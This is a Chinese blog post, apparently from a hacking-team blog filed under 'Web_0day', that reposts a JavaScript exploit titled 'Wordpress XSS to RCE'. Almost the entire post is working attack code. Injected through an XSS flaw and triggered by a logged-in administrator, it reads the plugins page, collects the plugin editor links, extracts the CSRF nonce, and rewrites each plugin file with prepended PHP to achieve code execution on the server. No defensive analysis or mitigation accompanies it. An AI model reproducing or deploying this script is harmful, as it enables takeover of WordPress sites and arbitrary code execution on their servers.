注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

K8拉登哥哥's Blog

K8搞基大队[K8team] 信息安全 网络安全 0day漏洞 渗透测试 黑客

 
 
 

日志

 
 

WordPress 4.2.1 XSS / Code Execution  

2015-05-07 00:57:05|  分类: Web_0day |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
/*
Author: @Evex_1337
Title: Wordpress XSS to RCE
Description: This Exploit Uses XSS Vulnerabilities in Wordpress Plugins/Themes/Core To End Up Executing Code After The Being Triggered With Administrator Previliged User. ?\_(ツ)_/?
Enjoy.
*/



//Installed Plugins Page
plugins = (window.location['href'].indexOf('/wp-admin/') != - 1) ? 'plugins.php' : 'wp-admin/plugins.php';
//Inject "XSS" Div
jQuery('body').append('<div id="xss" ></div>');
xss_div = jQuery('#xss');
xss_div.hide();
//Get Installed Plugins Page Source and Append it to "XSS" Div
jQuery.ajax({
  url: plugins,
  type: 'GET',
  async: false,
  cache: false,
  timeout: 30000,
  success: function (txt) {
    xss_div.html(txt);
  }
});
//Put All Plugins Edit URL in Array
plugins_edit = [];
xss_div.find('a').each(function () {
  if (jQuery(this).attr('href').indexOf('?file=') != - 1) {
      plugins_edit.push(jQuery(this).attr('href'));
  }
});
//Inject Payload
for(var i = 0; i < plugins_edit.length; i++){
jQuery.ajax({
  url: plugins_edit[i],
  type: 'GET',
  async: false,
  cache: false,
  timeout: 30000,
  success: function (txt) {
    xss_div.html(txt);
    _wpnonce = jQuery('form#template').context.body.innerHTML.match('name="_wpnonce" value="(.*?)"')[1];
    old_code = jQuery('form#template div textarea#newcontent')[0].value;
    payload = '<?php phpinfo(); ?>';
    new_code = payload + "\n" + old_code;
    file = plugins_edit[i].split("file=")[1];
    
    jQuery.ajax({
      url: plugins_edit[i],
      type: 'POST',
      data: {"_wpnonce":_wpnonce,"newcontent":new_code,"action":"update","file":file,"submit":"Update File"},
      async: false,
      cache: false,
      timeout: 30000,
      success: function (txt) {
        xss_div.html(txt);
        if(jQuery('form#template div textarea#newcontent')[0].value.indexOf(payload) != -1){
            // Passed, this is up to you ( skiddies Filter :D )
            injected_file = window.location.href.split('wp-admin')[0] + "/wp-content/plugins/"+file; //http://localhost/wp//wp-content/plugins/504-redirects/redirects.php
            
            throw new Error("");
        }
        
      }
    });
    
  }
});

}
  评论这张
 
阅读(979)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2016